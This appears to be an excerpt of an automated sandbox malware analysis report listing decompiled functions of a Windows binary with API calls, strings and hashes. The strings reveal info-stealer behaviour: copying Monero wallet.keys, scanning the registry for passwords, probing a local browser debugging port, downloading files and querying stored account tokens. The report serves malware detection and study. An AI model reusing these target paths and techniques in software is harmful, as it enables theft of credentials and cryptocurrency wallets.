                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                        • String ID:
                                        • API String ID: 3541710228-0
                                        • Opcode ID: 38314b373589503cb70e8b9b76d34036a3bcbb1da58224b5c9c74c703cb9f0f3
                                        • Instruction ID: 1b44e037558b9f8faf49e2634e9ff825e30199d3e7831afa09a3c8c69f58e4a0
                                        • Opcode Fuzzy Hash: 38314b373589503cb70e8b9b76d34036a3bcbb1da58224b5c9c74c703cb9f0f3
                                        • Instruction Fuzzy Hash: 6A7177B6900208ABDF14EBA1DD45FEE7379AF88304F00859DF605A6181EB38EB58CF55
                                        Function 004E1310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 004E12A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 004E12B4
                                          • Part of subcall function 004E12A0: RtlAllocateHeap.NTDLL(00000000), ref: 004E12BB
                                          • Part of subcall function 004E12A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 004E12D7
                                          • Part of subcall function 004E12A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 004E12F5
                                          • Part of subcall function 004E12A0: RegCloseKey.ADVAPI32(?), ref: 004E12FF
                                        • lstrcat.KERNEL32(?,00000000), ref: 004E134F
                                        • lstrlen.KERNEL32(?), ref: 004E135C
                                        • lstrcat.KERNEL32(?,.keys), ref: 004E1377
                                          • Part of subcall function 004FAA50: lstrcpy.KERNEL32(00500E1A,00000000), ref: 004FAA98
                                          • Part of subcall function 004FACC0: lstrlen.KERNEL32(?,01458FB0,?,\Monero\wallet.keys,00500E1A), ref: 004FACD5
                                          • Part of subcall function 004FACC0: lstrcpy.KERNEL32(00000000), ref: 004FAD14
                                          • Part of subcall function 004FACC0: lstrcat.KERNEL32(00000000,00000000), ref: 004FAD22
                                          • Part of subcall function 004FABB0: lstrcpy.KERNEL32(?,00500E1A), ref: 004FAC15
                                          • Part of subcall function 004F8CF0: GetSystemTime.KERNEL32(00500E1B,0145A610,005005B6,?,?,004E13F9,?,0000001A,00500E1B,00000000,?,01458FB0,?,\Monero\wallet.keys,00500E1A), ref: 004F8D16
                                          • Part of subcall function 004FAC30: lstrcpy.KERNEL32(00000000,?), ref: 004FAC82
                                          • Part of subcall function 004FAC30: lstrcat.KERNEL32(00000000), ref: 004FAC92
                                        • CopyFileA.KERNEL32(?,00000000,00000001), ref: 004E1465
                                          • Part of subcall function 004FAAB0: lstrcpy.KERNEL32(?,00000000), ref: 004FAAF6
                                          • Part of subcall function 004EA110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004EA13C
                                          • Part of subcall function 004EA110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 004EA161
                                          • Part of subcall function 004EA110: LocalAlloc.KERNEL32(00000040,?), ref: 004EA181
                                          • Part of subcall function 004EA110: ReadFile.KERNEL32(000000FF,?,00000000,004E148F,00000000), ref: 004EA1AA
                                          • Part of subcall function 004EA110: LocalFree.KERNEL32(004E148F), ref: 004EA1E0
                                          • Part of subcall function 004EA110: CloseHandle.KERNEL32(000000FF), ref: 004EA1EA
                                        • DeleteFileA.KERNEL32(00000000), ref: 004E14EF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                        • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                        • API String ID: 3478931302-218353709
                                        • Opcode ID: bd4c79d318db1ad959f2e248253705a606a79c40142e72a40279aaa612861d25
                                        • Instruction ID: d0077ad2edc02528ec08b31accd7f4372f6ba4813393e9ed77d550f4ae6f8606
                                        • Opcode Fuzzy Hash: bd4c79d318db1ad959f2e248253705a606a79c40142e72a40279aaa612861d25
                                        • Instruction Fuzzy Hash: AF514DB1D5011C5BCB15EB61DDA6FED733CAB50304F4045DDB30A62092EE386B98CAAA
                                        Function 004E9A50 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 107networkCOMMON
                                        Download Yara Rule
                                        APIs
                                        • InternetOpenA.WININET(00500AF6,00000001,00000000,00000000,00000000), ref: 004E9A6A
                                        • InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 004E9AAB
                                        • InternetCloseHandle.WININET(00000000), ref: 004E9AC7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Internet$Open$CloseHandle
                                        • String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
                                        • API String ID: 3289985339-2144369209
                                        • Opcode ID: 2f45c1682dbb7d0b60eb35e1d40fda76b0f5551cbfae96c5fac0e7c021cab54a
                                        • Instruction ID: 15c118ce9e85331c3bb982f9a5f09cefb8634aeff52e15b7e385c40a932545de
                                        • Opcode Fuzzy Hash: 2f45c1682dbb7d0b60eb35e1d40fda76b0f5551cbfae96c5fac0e7c021cab54a
                                        • Instruction Fuzzy Hash: A9412035A1025CAFCB14DF95CC95FED7774BB88740F104199F509AA1D0CBB8AE80CB68
                                        Function 004E7630 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 004E7330: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 004E739A
                                          • Part of subcall function 004E7330: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 004E7411
                                          • Part of subcall function 004E7330: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 004E746D
                                          • Part of subcall function 004E7330: GetProcessHeap.KERNEL32(00000000,?), ref: 004E74B2
                                          • Part of subcall function 004E7330: HeapFree.KERNEL32(00000000), ref: 004E74B9
                                        • lstrcat.KERNEL32(00000000,0050192C), ref: 004E7666
                                        • lstrcat.KERNEL32(00000000,00000000), ref: 004E76A8
                                        • lstrcat.KERNEL32(00000000, : ), ref: 004E76BA
                                        • lstrcat.KERNEL32(00000000,00000000), ref: 004E76EF
                                        • lstrcat.KERNEL32(00000000,00501934), ref: 004E7700
                                        • lstrcat.KERNEL32(00000000,00000000), ref: 004E7733
                                        • lstrcat.KERNEL32(00000000,00501938), ref: 004E774D
                                        • task.LIBCPMTD ref: 004E775B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                                        • String ID: :
                                        • API String ID: 2677904052-3653984579
                                        • Opcode ID: b4998c20ca0133f9190d474867f3df9a62157f14658581ef7992ee4a73564260
                                        • Instruction ID: 61876cfb86f820af94ab3d832aceeecddc627c77218cee6168b61d0e83326689
                                        • Opcode Fuzzy Hash: b4998c20ca0133f9190d474867f3df9a62157f14658581ef7992ee4a73564260
                                        • Instruction Fuzzy Hash: 5F315271A08108DBDF09EBA1DC95EFE7779BB84305B10820EF106B72A0DA3CA945CB59
                                        Function 004F8290 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0145E010,00000000,?,00500E14,00000000,?,00000000), ref: 004F82C0
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 004F82C7
                                        • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 004F82E8
                                        • __aulldiv.LIBCMT ref: 004F8302
                                        • __aulldiv.LIBCMT ref: 004F8310
                                        • wsprintfA.USER32 ref: 004F833C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                                        • String ID: %d MB$@
                                        • API String ID: 2774356765-3474575989
                                        • Opcode ID: 7045acc58df80c1678ff17867035305f998b726c820834fbb2891bee6207a43a
                                        • Instruction ID: 4def1265023d1da3712b72b709b50cdea7c8b3fa779444d242b0df35df55cead
                                        • Opcode Fuzzy Hash: 7045acc58df80c1678ff17867035305f998b726c820834fbb2891bee6207a43a
                                        • Instruction Fuzzy Hash: F421F9B1E44208ABDB04DFD5CC45FAEB7B9FB44B14F104619F715BB280C77959018BA9
                                        Function 004E60F0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 004FAAB0: lstrcpy.KERNEL32(?,00000000), ref: 004FAAF6
                                          • Part of subcall function 004E4800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004E4889
                                          • Part of subcall function 004E4800: InternetCrackUrlA.WININET(00000000,00000000), ref: 004E4899
                                        • InternetOpenA.WININET(00500DFB,00000001,00000000,00000000,00000000), ref: 004E615F
                                        • StrCmpCA.SHLWAPI(?,0145E888), ref: 004E6197
                                        • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 004E61DF
                                        • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 004E6203
                                        • InternetReadFile.WININET(?,?,00000400,?), ref: 004E622C
                                        • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 004E625A
                                        • CloseHandle.KERNEL32(?,?,00000400), ref: 004E6299
                                        • InternetCloseHandle.WININET(?), ref: 004E62A3
                                        • InternetCloseHandle.WININET(00000000), ref: 004E62B0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                        • String ID:
                                        • API String ID: 2507841554-0
                                        • Opcode ID: 38c538d8a728081d00a3c4bef4ead02790f92d739f028beca6e0026c779bbee9
                                        • Instruction ID: 1936503660db1ab69b783554d8d097f96fb9f87057da2e184ec460ca1cea2da5
                                        • Opcode Fuzzy Hash: 38c538d8a728081d00a3c4bef4ead02790f92d739f028beca6e0026c779bbee9
                                        • Instruction Fuzzy Hash: 4D5152B1A0020CABDB24DF95CC45FEE7779AB44345F008199F709A71C0DB786A89CF69
                                        Function 0056012E Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • type_info::operator==.LIBVCRUNTIME ref: 0056024D
                                        • ___TypeMatch.LIBVCRUNTIME ref: 0056035B
                                        • CatchIt.LIBVCRUNTIME ref: 005603AC
                                        • CallUnexpected.LIBVCRUNTIME ref: 005604C8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CallCatchMatchTypeUnexpectedtype_info::operator==
                                        • String ID: csm$csm$csm
                                        • API String ID: 2356445960-393685449
                                        • Opcode ID: 0aa7d8e53ae69f4e65a14af659269dcd6c8d533d9c3592b436de8e99f8465a7b
                                        • Instruction ID: 06ad7b725b57d686aa4144af296c951ac2542190995cff15f6e867a0a730a3e7
                                        • Opcode Fuzzy Hash: 0aa7d8e53ae69f4e65a14af659269dcd6c8d533d9c3592b436de8e99f8465a7b
                                        • Instruction Fuzzy Hash: 1EB1CC3580020AEFCF25EFA4C8899AFBFB5FF44312F10556AE9116B292D730DA51CB91
                                        Function 004E7330 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 149registrymemoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 004E739A
                                        • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 004E7411
                                        • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 004E746D
                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 004E74B2
                                        • HeapFree.KERNEL32(00000000), ref: 004E74B9
                                        • task.LIBCPMTD ref: 004E75B5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$EnumFreeOpenProcessValuetask
                                        • String ID: Password
                                        • API String ID: 775622407-3434357891
                                        • Opcode ID: 8d0f1de2991cb1ab3b8f47de54efd86b07f2109694dfdd92b02a70d76d2d8399
                                        • Instruction ID: b5e4fcf26f223655eea5b6e5f4f4af49c836f8418b3d97a8aff5893cc33ba710
                                        • Opcode Fuzzy Hash: 8d0f1de2991cb1ab3b8f47de54efd86b07f2109694dfdd92b02a70d76d2d8399
                                        • Instruction Fuzzy Hash: 6C612CB180416C9BDB24DB51CC41FDAB7B8BF44305F0085EAE649A6281EB746FC9CFA5
                                        Function 004EBA50 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 004FAA50: lstrcpy.KERNEL32(00500E1A,00000000), ref: 004FAA98
                                          • Part of subcall function 004FACC0: lstrlen.KERNEL32(?,01458FB0,?,\Monero\wallet.keys,00500E1A), ref: 004FACD5
                                          • Part of subcall function 004FACC0: lstrcpy.KERNEL32(00000000), ref: 004FAD14
                                          • Part of subcall function 004FACC0: lstrcat.KERNEL32(00000000,00000000), ref: 004FAD22
                                          • Part of subcall function 004FAC30: lstrcpy.KERNEL32(00000000,?), ref: 004FAC82
                                          • Part of subcall function 004FAC30: lstrcat.KERNEL32(00000000), ref: 004FAC92
                                          • Part of subcall function 004FABB0: lstrcpy.KERNEL32(?,00500E1A), ref: 004FAC15
                                          • Part of subcall function 004FAAB0: lstrcpy.KERNEL32(?,00000000), ref: 004FAAF6
                                        • lstrlen.KERNEL32(00000000), ref: 004EBC6F
                                          • Part of subcall function 004F8FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 004F8FE2
                                        • StrStrA.SHLWAPI(00000000,AccountId), ref: 004EBC9D
                                        • lstrlen.KERNEL32(00000000), ref: 004EBD75
                                        • lstrlen.KERNEL32(00000000), ref: 004EBD89
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                                        • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
